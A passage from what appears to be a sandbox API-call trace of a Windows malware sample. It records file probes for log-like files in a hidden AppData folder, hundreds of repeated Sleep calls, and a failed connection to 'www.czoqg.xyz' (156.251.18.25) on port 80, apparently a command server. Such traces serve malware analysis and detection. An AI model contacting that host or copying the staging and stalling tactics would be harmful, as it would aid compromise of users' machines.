NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.895] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0199.896] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0199.896] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b7c0) returned 1 [0199.896] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.896] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0199.896] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0199.896] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892af50) returned 1 [0199.896] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.896] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0199.896] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0199.896] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892af50) returned 1 [0199.896] Sleep (dwMilliseconds=0x7d0) [0199.898] Sleep (dwMilliseconds=0x7d0) [0199.899] Sleep (dwMilliseconds=0x7d0) [0199.901] Sleep (dwMilliseconds=0x7d0) [0199.902] Sleep (dwMilliseconds=0x7d0) [0199.904] Sleep (dwMilliseconds=0x7d0) [0199.905] Sleep (dwMilliseconds=0x7d0) [0199.907] Sleep (dwMilliseconds=0x7d0) [0199.908] Sleep (dwMilliseconds=0x7d0) [0199.910] Sleep (dwMilliseconds=0x7d0) [0199.911] Sleep (dwMilliseconds=0x7d0) [0199.913] Sleep (dwMilliseconds=0x7d0) [0199.914] Sleep (dwMilliseconds=0x7d0) [0199.916] Sleep (dwMilliseconds=0x7d0) [0199.917] Sleep (dwMilliseconds=0x7d0) [0199.919] Sleep (dwMilliseconds=0x7d0) [0199.920] Sleep (dwMilliseconds=0x7d0) [0199.922] Sleep (dwMilliseconds=0x7d0) [0199.923] Sleep (dwMilliseconds=0x7d0) [0199.925] Sleep (dwMilliseconds=0x7d0) [0199.926] Sleep (dwMilliseconds=0x7d0) [0199.928] Sleep (dwMilliseconds=0x7d0) [0199.929] Sleep (dwMilliseconds=0x7d0) [0199.932] Sleep (dwMilliseconds=0x7d0) [0199.935] Sleep (dwMilliseconds=0x7d0) [0199.937] Sleep (dwMilliseconds=0x7d0) [0199.941] Sleep (dwMilliseconds=0x7d0) [0200.001] Sleep (dwMilliseconds=0x7d0) [0200.002] Sleep (dwMilliseconds=0x7d0) [0200.004] Sleep (dwMilliseconds=0x7d0) [0200.005] Sleep (dwMilliseconds=0x7d0) [0200.007] Sleep (dwMilliseconds=0x7d0) [0200.009] Sleep (dwMilliseconds=0x7d0) [0200.011] Sleep (dwMilliseconds=0x7d0) [0200.012] Sleep (dwMilliseconds=0x7d0) [0200.014] Sleep (dwMilliseconds=0x7d0) [0200.015] Sleep (dwMilliseconds=0x7d0) [0200.017] Sleep (dwMilliseconds=0x7d0) [0200.018] Sleep (dwMilliseconds=0x7d0) [0200.020] Sleep (dwMilliseconds=0x7d0) [0200.021] Sleep (dwMilliseconds=0x7d0) [0200.023] Sleep (dwMilliseconds=0x7d0) [0200.024] Sleep (dwMilliseconds=0x7d0) [0200.026] Sleep (dwMilliseconds=0x7d0) [0200.027] Sleep (dwMilliseconds=0x7d0) [0200.029] Sleep (dwMilliseconds=0x7d0) [0200.030] Sleep (dwMilliseconds=0x7d0) [0200.032] Sleep (dwMilliseconds=0x7d0) [0200.033] Sleep (dwMilliseconds=0x7d0) [0200.035] Sleep (dwMilliseconds=0x7d0) [0200.036] Sleep (dwMilliseconds=0x7d0) [0200.038] Sleep (dwMilliseconds=0x7d0) [0200.039] Sleep (dwMilliseconds=0x7d0) [0200.041] Sleep (dwMilliseconds=0x7d0) [0200.042] Sleep (dwMilliseconds=0x7d0) [0200.044] Sleep (dwMilliseconds=0x7d0) [0200.045] Sleep (dwMilliseconds=0x7d0) [0200.047] Sleep (dwMilliseconds=0x7d0) [0200.048] Sleep (dwMilliseconds=0x7d0) [0200.050] Sleep (dwMilliseconds=0x7d0) [0200.052] Sleep (dwMilliseconds=0x7d0) [0200.054] Sleep (dwMilliseconds=0x7d0) [0200.055] Sleep (dwMilliseconds=0x7d0) [0200.057] Sleep (dwMilliseconds=0x7d0) [0200.058] Sleep (dwMilliseconds=0x7d0) [0200.060] Sleep (dwMilliseconds=0x7d0) [0200.061] Sleep (dwMilliseconds=0x7d0) [0200.063] Sleep (dwMilliseconds=0x7d0) [0200.064] Sleep (dwMilliseconds=0x7d0) [0200.066] Sleep (dwMilliseconds=0x7d0) [0200.067] Sleep (dwMilliseconds=0x7d0) [0200.069] Sleep (dwMilliseconds=0x7d0) [0200.070] Sleep (dwMilliseconds=0x7d0) [0200.072] Sleep (dwMilliseconds=0x7d0) [0200.073] Sleep (dwMilliseconds=0x7d0) [0200.075] Sleep (dwMilliseconds=0x7d0) [0200.076] Sleep (dwMilliseconds=0x7d0) [0200.078] Sleep (dwMilliseconds=0x7d0) [0200.079] Sleep (dwMilliseconds=0x7d0) [0200.081] Sleep (dwMilliseconds=0x7d0) [0200.082] Sleep (dwMilliseconds=0x7d0) [0200.084] Sleep (dwMilliseconds=0x7d0) [0200.085] Sleep (dwMilliseconds=0x7d0) [0200.087] Sleep (dwMilliseconds=0x7d0) [0200.088] Sleep (dwMilliseconds=0x7d0) [0200.090] Sleep (dwMilliseconds=0x7d0) [0200.091] Sleep (dwMilliseconds=0x7d0) [0200.093] Sleep (dwMilliseconds=0x7d0) [0200.094] Sleep (dwMilliseconds=0x7d0) [0200.096] Sleep (dwMilliseconds=0x7d0) [0200.097] Sleep (dwMilliseconds=0x7d0) [0200.099] Sleep (dwMilliseconds=0x7d0) [0200.100] Sleep (dwMilliseconds=0x7d0) [0200.102] Sleep (dwMilliseconds=0x7d0) [0200.103] Sleep (dwMilliseconds=0x7d0) [0200.105] Sleep (dwMilliseconds=0x7d0) [0200.106] Sleep (dwMilliseconds=0x7d0) [0200.108] Sleep (dwMilliseconds=0x7d0) [0200.109] Sleep (dwMilliseconds=0x7d0) [0200.111] Sleep (dwMilliseconds=0x7d0) [0200.112] Sleep (dwMilliseconds=0x7d0) [0200.155] Sleep (dwMilliseconds=0x7d0) [0200.157] Sleep (dwMilliseconds=0x7d0) [0200.159] Sleep (dwMilliseconds=0x7d0) [0200.160] Sleep (dwMilliseconds=0x7d0) [0200.162] Sleep (dwMilliseconds=0x7d0) [0200.163] Sleep (dwMilliseconds=0x7d0) [0200.165] Sleep (dwMilliseconds=0x7d0) [0200.166] Sleep (dwMilliseconds=0x7d0) [0200.168] Sleep (dwMilliseconds=0x7d0) [0200.170] Sleep (dwMilliseconds=0x7d0) [0200.171] Sleep (dwMilliseconds=0x7d0) [0200.173] Sleep (dwMilliseconds=0x7d0) [0200.174] Sleep (dwMilliseconds=0x7d0) [0200.176] Sleep (dwMilliseconds=0x7d0) [0200.177] Sleep (dwMilliseconds=0x7d0) [0200.179] Sleep (dwMilliseconds=0x7d0) [0200.180] Sleep (dwMilliseconds=0x7d0) [0200.182] Sleep (dwMilliseconds=0x7d0) [0200.183] Sleep (dwMilliseconds=0x7d0) [0200.185] Sleep (dwMilliseconds=0x7d0) [0200.186] Sleep (dwMilliseconds=0x7d0) [0200.188] Sleep (dwMilliseconds=0x7d0) [0200.189] Sleep (dwMilliseconds=0x7d0) [0200.191] Sleep (dwMilliseconds=0x7d0) [0200.192] Sleep (dwMilliseconds=0x7d0) [0200.194] Sleep (dwMilliseconds=0x7d0) [0200.195] Sleep (dwMilliseconds=0x7d0) [0200.197] Sleep (dwMilliseconds=0x7d0) [0200.198] Sleep (dwMilliseconds=0x7d0) [0200.200] Sleep (dwMilliseconds=0x7d0) [0200.201] Sleep (dwMilliseconds=0x7d0) [0200.203] Sleep (dwMilliseconds=0x7d0) [0200.204] Sleep (dwMilliseconds=0x7d0) [0200.206] Sleep (dwMilliseconds=0x7d0) [0200.207] Sleep (dwMilliseconds=0x7d0) [0200.209] Sleep (dwMilliseconds=0x7d0) [0200.210] Sleep (dwMilliseconds=0x7d0) [0200.212] Sleep (dwMilliseconds=0x7d0) [0200.213] Sleep (dwMilliseconds=0x7d0) [0200.215] Sleep (dwMilliseconds=0x7d0) [0200.217] Sleep (dwMilliseconds=0x7d0) [0200.219] Sleep (dwMilliseconds=0x7d0) [0200.221] Sleep (dwMilliseconds=0x7d0) [0200.222] Sleep (dwMilliseconds=0x7d0) [0200.223] Sleep (dwMilliseconds=0x7d0) [0200.225] Sleep (dwMilliseconds=0x7d0) [0200.227] Sleep (dwMilliseconds=0x7d0) [0200.228] Sleep (dwMilliseconds=0x7d0) [0200.230] Sleep (dwMilliseconds=0x7d0) [0200.231] Sleep (dwMilliseconds=0x7d0) [0200.234] Sleep (dwMilliseconds=0x7d0) [0200.236] Sleep (dwMilliseconds=0x7d0) [0200.239] Sleep (dwMilliseconds=0x7d0) [0200.241] Sleep (dwMilliseconds=0x7d0) [0200.243] Sleep (dwMilliseconds=0x7d0) [0200.246] Sleep (dwMilliseconds=0x7d0) [0200.248] Sleep (dwMilliseconds=0x7d0) [0200.249] Sleep (dwMilliseconds=0x7d0) [0200.251] Sleep (dwMilliseconds=0x7d0) [0200.252] Sleep (dwMilliseconds=0x7d0) [0200.256] Sleep (dwMilliseconds=0x7d0) [0200.257] Sleep (dwMilliseconds=0x7d0) [0200.259] Sleep (dwMilliseconds=0x7d0) [0200.260] Sleep (dwMilliseconds=0x7d0) [0200.262] Sleep (dwMilliseconds=0x7d0) [0200.263] Sleep (dwMilliseconds=0x7d0) [0200.265] Sleep (dwMilliseconds=0x7d0) [0200.266] Sleep (dwMilliseconds=0x7d0) [0200.269] Sleep (dwMilliseconds=0x7d0) [0200.272] Sleep (dwMilliseconds=0x7d0) [0200.275] Sleep (dwMilliseconds=0x7d0) [0200.277] Sleep (dwMilliseconds=0x7d0) [0200.280] Sleep (dwMilliseconds=0x7d0) [0200.284] Sleep (dwMilliseconds=0x7d0) [0200.286] Sleep (dwMilliseconds=0x7d0) [0200.288] Sleep (dwMilliseconds=0x7d0) [0200.290] Sleep (dwMilliseconds=0x7d0) [0200.293] Sleep (dwMilliseconds=0x7d0) [0200.294] Sleep (dwMilliseconds=0x7d0) [0200.296] Sleep (dwMilliseconds=0x7d0) [0200.297] Sleep (dwMilliseconds=0x7d0) [0200.299] Sleep (dwMilliseconds=0x7d0) [0200.300] Sleep (dwMilliseconds=0x7d0) [0200.302] Sleep (dwMilliseconds=0x7d0) [0200.303] Sleep (dwMilliseconds=0x7d0) [0200.305] Sleep (dwMilliseconds=0x7d0) [0200.306] Sleep (dwMilliseconds=0x7d0) [0200.308] Sleep (dwMilliseconds=0x7d0) [0200.309] Sleep (dwMilliseconds=0x7d0) [0200.311] Sleep (dwMilliseconds=0x7d0) [0200.312] Sleep (dwMilliseconds=0x7d0) [0200.314] Sleep (dwMilliseconds=0x7d0) [0200.315] Sleep (dwMilliseconds=0x7d0) [0200.317] Sleep (dwMilliseconds=0x7d0) [0200.318] Sleep (dwMilliseconds=0x7d0) [0200.320] Sleep (dwMilliseconds=0x7d0) [0200.321] Sleep (dwMilliseconds=0x7d0) [0200.323] Sleep (dwMilliseconds=0x7d0) [0200.324] Sleep (dwMilliseconds=0x7d0) [0200.326] Sleep (dwMilliseconds=0x7d0) [0200.327] Sleep (dwMilliseconds=0x7d0) [0200.329] Sleep (dwMilliseconds=0x7d0) [0200.330] Sleep (dwMilliseconds=0x7d0) [0200.332] Sleep (dwMilliseconds=0x7d0) [0200.333] Sleep (dwMilliseconds=0x7d0) [0200.335] Sleep (dwMilliseconds=0x7d0) [0200.336] Sleep (dwMilliseconds=0x7d0) [0200.338] Sleep (dwMilliseconds=0x7d0) [0200.339] Sleep (dwMilliseconds=0x7d0) [0200.341] Sleep (dwMilliseconds=0x7d0) [0200.342] Sleep (dwMilliseconds=0x7d0) [0200.344] Sleep (dwMilliseconds=0x7d0) [0200.345] Sleep (dwMilliseconds=0x7d0) [0200.347] Sleep (dwMilliseconds=0x7d0) [0200.348] Sleep (dwMilliseconds=0x7d0) [0200.350] Sleep (dwMilliseconds=0x7d0) [0200.351] Sleep (dwMilliseconds=0x7d0) [0200.353] Sleep (dwMilliseconds=0x7d0) [0200.354] Sleep (dwMilliseconds=0x7d0) [0200.357] Sleep (dwMilliseconds=0x7d0) [0200.359] Sleep (dwMilliseconds=0x7d0) [0200.360] Sleep (dwMilliseconds=0x7d0) [0200.362] Sleep (dwMilliseconds=0x7d0) [0200.363] Sleep (dwMilliseconds=0x7d0) [0200.365] Sleep (dwMilliseconds=0x7d0) [0200.366] Sleep (dwMilliseconds=0x7d0) [0200.368] Sleep (dwMilliseconds=0x7d0) [0200.369] Sleep (dwMilliseconds=0x7d0) [0200.371] Sleep (dwMilliseconds=0x7d0) [0200.372] Sleep (dwMilliseconds=0x7d0) [0200.374] Sleep (dwMilliseconds=0x7d0) [0200.375] Sleep (dwMilliseconds=0x7d0) [0200.377] Sleep (dwMilliseconds=0x7d0) [0200.378] Sleep (dwMilliseconds=0x7d0) [0200.380] Sleep (dwMilliseconds=0x7d0) [0200.381] Sleep (dwMilliseconds=0x7d0) [0200.383] Sleep (dwMilliseconds=0x7d0) [0200.384] Sleep (dwMilliseconds=0x7d0) [0200.386] Sleep (dwMilliseconds=0x7d0) [0200.388] Sleep (dwMilliseconds=0x7d0) [0200.390] Sleep (dwMilliseconds=0x7d0) [0200.392] Sleep (dwMilliseconds=0x7d0) [0200.394] Sleep (dwMilliseconds=0x7d0) [0200.401] Sleep (dwMilliseconds=0x7d0) [0200.404] Sleep (dwMilliseconds=0x7d0) [0200.405] Sleep (dwMilliseconds=0x7d0) [0200.407] Sleep (dwMilliseconds=0x7d0) [0200.408] Sleep (dwMilliseconds=0x7d0) [0200.410] Sleep (dwMilliseconds=0x7d0) [0200.411] Sleep (dwMilliseconds=0x7d0) [0200.413] Sleep (dwMilliseconds=0x7d0) [0200.414] Sleep (dwMilliseconds=0x7d0) [0200.416] Sleep (dwMilliseconds=0x7d0) [0200.417] Sleep (dwMilliseconds=0x7d0) [0200.419] Sleep (dwMilliseconds=0x7d0) [0200.421] Sleep (dwMilliseconds=0x7d0) [0200.423] Sleep (dwMilliseconds=0x7d0) [0200.424] Sleep (dwMilliseconds=0x7d0) [0200.426] Sleep (dwMilliseconds=0x7d0) [0200.431] Sleep (dwMilliseconds=0x7d0) [0200.436] Sleep (dwMilliseconds=0x7d0) [0200.505] Sleep (dwMilliseconds=0x7d0) [0200.506] Sleep (dwMilliseconds=0x7d0) [0200.508] Sleep (dwMilliseconds=0x7d0) [0200.509] Sleep (dwMilliseconds=0x7d0) [0200.511] Sleep (dwMilliseconds=0x7d0) [0200.512] Sleep (dwMilliseconds=0x7d0) [0200.514] Sleep (dwMilliseconds=0x7d0) [0200.515] Sleep (dwMilliseconds=0x7d0) [0200.517] Sleep (dwMilliseconds=0x7d0) [0200.518] Sleep (dwMilliseconds=0x7d0) [0200.520] Sleep (dwMilliseconds=0x7d0) [0200.521] Sleep (dwMilliseconds=0x7d0) [0200.523] Sleep (dwMilliseconds=0x7d0) [0200.524] Sleep (dwMilliseconds=0x7d0) [0200.526] Sleep (dwMilliseconds=0x7d0) [0200.527] Sleep (dwMilliseconds=0x7d0) [0200.529] Sleep (dwMilliseconds=0x7d0) [0200.530] Sleep (dwMilliseconds=0x7d0) [0200.532] Sleep (dwMilliseconds=0x7d0) [0200.533] Sleep (dwMilliseconds=0x7d0) [0200.535] Sleep (dwMilliseconds=0x7d0) [0200.536] Sleep (dwMilliseconds=0x7d0) [0200.538] Sleep (dwMilliseconds=0x7d0) [0200.539] Sleep (dwMilliseconds=0x7d0) [0200.541] Sleep (dwMilliseconds=0x7d0) [0200.542] Sleep (dwMilliseconds=0x7d0) [0200.544] Sleep (dwMilliseconds=0x7d0) [0200.545] Sleep (dwMilliseconds=0x7d0) [0200.547] Sleep (dwMilliseconds=0x7d0) [0200.548] Sleep (dwMilliseconds=0x7d0) [0200.550] Sleep (dwMilliseconds=0x7d0) [0200.551] Sleep (dwMilliseconds=0x7d0) [0200.553] Sleep (dwMilliseconds=0x7d0) [0200.554] Sleep (dwMilliseconds=0x7d0) [0200.557] Sleep (dwMilliseconds=0x7d0) [0200.558] Sleep (dwMilliseconds=0x7d0) [0200.560] Sleep (dwMilliseconds=0x7d0) [0200.561] Sleep (dwMilliseconds=0x7d0) [0200.563] Sleep (dwMilliseconds=0x7d0) [0200.564] Sleep (dwMilliseconds=0x7d0) [0200.566] Sleep (dwMilliseconds=0x7d0) [0200.567] Sleep (dwMilliseconds=0x7d0) [0200.569] Sleep (dwMilliseconds=0x7d0) [0200.570] Sleep (dwMilliseconds=0x7d0) [0200.572] Sleep (dwMilliseconds=0x7d0) [0200.573] Sleep (dwMilliseconds=0x7d0) [0200.575] Sleep (dwMilliseconds=0x7d0) [0200.576] Sleep (dwMilliseconds=0x7d0) [0200.578] Sleep (dwMilliseconds=0x7d0) [0200.579] Sleep (dwMilliseconds=0x7d0) [0200.581] Sleep (dwMilliseconds=0x7d0) [0200.582] Sleep (dwMilliseconds=0x7d0) [0200.584] Sleep (dwMilliseconds=0x7d0) [0200.585] Sleep (dwMilliseconds=0x7d0) [0200.587] Sleep (dwMilliseconds=0x7d0) [0200.588] Sleep (dwMilliseconds=0x7d0) [0200.590] Sleep (dwMilliseconds=0x7d0) [0200.591] Sleep (dwMilliseconds=0x7d0) [0200.604] Sleep (dwMilliseconds=0x7d0) [0200.611] Sleep (dwMilliseconds=0x7d0) [0200.620] Sleep (dwMilliseconds=0x7d0) [0200.693] Sleep (dwMilliseconds=0x7d0) [0200.694] Sleep (dwMilliseconds=0x7d0) [0200.696] Sleep (dwMilliseconds=0x7d0) [0200.697] Sleep (dwMilliseconds=0x7d0) [0200.699] Sleep (dwMilliseconds=0x7d0) [0200.701] Sleep (dwMilliseconds=0x7d0) [0200.702] Sleep (dwMilliseconds=0x7d0) [0200.704] Sleep (dwMilliseconds=0x7d0) [0200.705] Sleep (dwMilliseconds=0x7d0) [0200.706] Sleep (dwMilliseconds=0x7d0) [0200.708] Sleep (dwMilliseconds=0x7d0) [0200.709] Sleep (dwMilliseconds=0x7d0) [0200.711] Sleep (dwMilliseconds=0x7d0) [0200.712] Sleep (dwMilliseconds=0x7d0) [0200.714] Sleep (dwMilliseconds=0x7d0) [0200.715] Sleep (dwMilliseconds=0x7d0) [0200.717] Sleep (dwMilliseconds=0x7d0) [0200.718] Sleep (dwMilliseconds=0x7d0) [0200.720] Sleep (dwMilliseconds=0x7d0) [0200.722] Sleep (dwMilliseconds=0x7d0) [0200.723] Sleep (dwMilliseconds=0x7d0) [0200.724] Sleep (dwMilliseconds=0x7d0) [0200.726] Sleep (dwMilliseconds=0x7d0) [0200.727] Sleep (dwMilliseconds=0x7d0) [0200.729] Sleep (dwMilliseconds=0x7d0) [0200.730] Sleep (dwMilliseconds=0x7d0) [0200.732] Sleep (dwMilliseconds=0x7d0) [0200.733] Sleep (dwMilliseconds=0x7d0) [0200.735] Sleep (dwMilliseconds=0x7d0) [0200.736] Sleep (dwMilliseconds=0x7d0) [0200.738] Sleep (dwMilliseconds=0x7d0) [0200.739] Sleep (dwMilliseconds=0x7d0) [0200.741] Sleep (dwMilliseconds=0x7d0) [0200.742] Sleep (dwMilliseconds=0x7d0) [0200.744] Sleep (dwMilliseconds=0x7d0) [0200.745] Sleep (dwMilliseconds=0x7d0) [0200.747] Sleep (dwMilliseconds=0x7d0) [0200.748] Sleep (dwMilliseconds=0x7d0) [0200.750] Sleep (dwMilliseconds=0x7d0) [0200.751] Sleep (dwMilliseconds=0x7d0) [0200.753] Sleep (dwMilliseconds=0x7d0) [0200.754] Sleep (dwMilliseconds=0x7d0) [0200.756] Sleep (dwMilliseconds=0x7d0) [0200.757] Sleep (dwMilliseconds=0x7d0) [0200.759] Sleep (dwMilliseconds=0x7d0) [0200.760] Sleep (dwMilliseconds=0x7d0) [0200.762] Sleep (dwMilliseconds=0x7d0) [0200.763] Sleep (dwMilliseconds=0x7d0) [0200.765] Sleep (dwMilliseconds=0x7d0) [0200.766] Sleep (dwMilliseconds=0x7d0) [0200.768] Sleep (dwMilliseconds=0x7d0) [0200.769] Sleep (dwMilliseconds=0x7d0) [0200.771] Sleep (dwMilliseconds=0x7d0) [0200.772] Sleep (dwMilliseconds=0x7d0) [0200.774] Sleep (dwMilliseconds=0x7d0) [0200.775] Sleep (dwMilliseconds=0x7d0) [0200.777] Sleep (dwMilliseconds=0x7d0) [0200.778] Sleep (dwMilliseconds=0x7d0) [0200.780] Sleep (dwMilliseconds=0x7d0) [0200.782] Sleep (dwMilliseconds=0x7d0) [0200.784] Sleep (dwMilliseconds=0x7d0) [0200.785] Sleep (dwMilliseconds=0x7d0) [0200.787] Sleep (dwMilliseconds=0x7d0) [0200.788] Sleep (dwMilliseconds=0x7d0) [0200.790] Sleep (dwMilliseconds=0x7d0) [0200.791] Sleep (dwMilliseconds=0x7d0) [0200.793] Sleep (dwMilliseconds=0x7d0) [0200.794] Sleep (dwMilliseconds=0x7d0) [0200.796] Sleep (dwMilliseconds=0x7d0) [0200.797] Sleep (dwMilliseconds=0x7d0) [0200.799] Sleep (dwMilliseconds=0x7d0) [0200.800] Sleep (dwMilliseconds=0x7d0) [0200.802] Sleep (dwMilliseconds=0x7d0) [0200.803] Sleep (dwMilliseconds=0x7d0) [0200.805] Sleep (dwMilliseconds=0x7d0) [0200.806] Sleep (dwMilliseconds=0x7d0) [0200.808] Sleep (dwMilliseconds=0x7d0) [0200.809] Sleep (dwMilliseconds=0x7d0) [0200.811] Sleep (dwMilliseconds=0x7d0) [0200.812] Sleep (dwMilliseconds=0x7d0) [0200.814] Sleep (dwMilliseconds=0x7d0) [0200.815] Sleep (dwMilliseconds=0x7d0) [0200.817] Sleep (dwMilliseconds=0x7d0) [0200.818] Sleep (dwMilliseconds=0x7d0) [0200.820] Sleep (dwMilliseconds=0x7d0) [0200.821] Sleep (dwMilliseconds=0x7d0) [0200.823] Sleep (dwMilliseconds=0x7d0) [0200.824] Sleep (dwMilliseconds=0x7d0) [0200.826] Sleep (dwMilliseconds=0x7d0) [0200.827] Sleep (dwMilliseconds=0x7d0) [0200.829] Sleep (dwMilliseconds=0x7d0) [0200.830] Sleep (dwMilliseconds=0x7d0) [0200.832] Sleep (dwMilliseconds=0x7d0) [0200.833] Sleep (dwMilliseconds=0x7d0) [0200.835] Sleep (dwMilliseconds=0x7d0) [0200.836] Sleep (dwMilliseconds=0x7d0) [0200.838] Sleep (dwMilliseconds=0x7d0) [0200.839] Sleep (dwMilliseconds=0x7d0) [0200.841] Sleep (dwMilliseconds=0x7d0) [0200.842] Sleep (dwMilliseconds=0x7d0) [0200.844] Sleep (dwMilliseconds=0x7d0) [0200.845] Sleep (dwMilliseconds=0x7d0) [0200.847] Sleep (dwMilliseconds=0x7d0) [0200.848] Sleep (dwMilliseconds=0x7d0) [0200.850] Sleep (dwMilliseconds=0x7d0) [0200.851] Sleep (dwMilliseconds=0x7d0) [0200.853] Sleep (dwMilliseconds=0x7d0) [0200.854] Sleep (dwMilliseconds=0x7d0) [0200.856] Sleep (dwMilliseconds=0x7d0) [0200.857] Sleep (dwMilliseconds=0x7d0) [0200.859] Sleep (dwMilliseconds=0x7d0) [0200.860] Sleep (dwMilliseconds=0x7d0) [0200.862] Sleep (dwMilliseconds=0x7d0) [0200.864] Sleep (dwMilliseconds=0x7d0) [0200.865] Sleep (dwMilliseconds=0x7d0) [0200.866] Sleep (dwMilliseconds=0x7d0) [0200.868] Sleep (dwMilliseconds=0x7d0) [0200.869] Sleep (dwMilliseconds=0x7d0) [0200.871] Sleep (dwMilliseconds=0x7d0) [0200.872] Sleep (dwMilliseconds=0x7d0) [0200.874] Sleep (dwMilliseconds=0x7d0) [0200.875] socket (af=2, type=1, protocol=6) returned 0x26bc [0200.876] getaddrinfo (in: pNodeName="www.czoqg.xyz", pServiceName="80", pHints=0x8791b98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8791bc8 | out: ppResult=0x8791bc8*=0x88f7770*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8883360*(sa_family=2, sin_port=0x50, sin_addr="156.251.18.25"), ai_next=0x0)) returned 0 [0200.878] connect (s=0x26bc, name=0x8883360*(sa_family=2, sin_port=0x50, sin_addr="156.251.18.25"), namelen=16) returned -1 [0222.234] closesocket (s=0x26bc) returned 0 [0222.269] Sleep (dwMilliseconds=0x7d0) [0222.346] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.346] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.346] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0222.346] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.346] RtlDosPathNameToNtPathName_U (in: 